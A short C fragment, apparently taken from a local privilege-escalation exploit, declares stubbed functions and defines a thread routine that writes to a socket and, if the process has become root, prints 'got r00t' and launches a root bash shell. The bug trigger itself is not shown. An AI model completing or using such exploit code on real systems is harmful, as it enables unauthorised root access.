
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int execl (char*,char*,int *) ;
 scalar_t__ getuid () ;
 int perror (char*) ;
 int printf (char*) ;
 int * sockets ;
 int write (int ,char*,int) ;

void *write_thr(void *arg) {

 write(sockets[1], "\x5c", 1);

 if (getuid() == 0) {
  printf("[+] got r00t\n");
  execl("/bin/bash", "bash", ((void*)0));
  perror("execl()");
 }
 printf("[-] something went wrong\n");
}
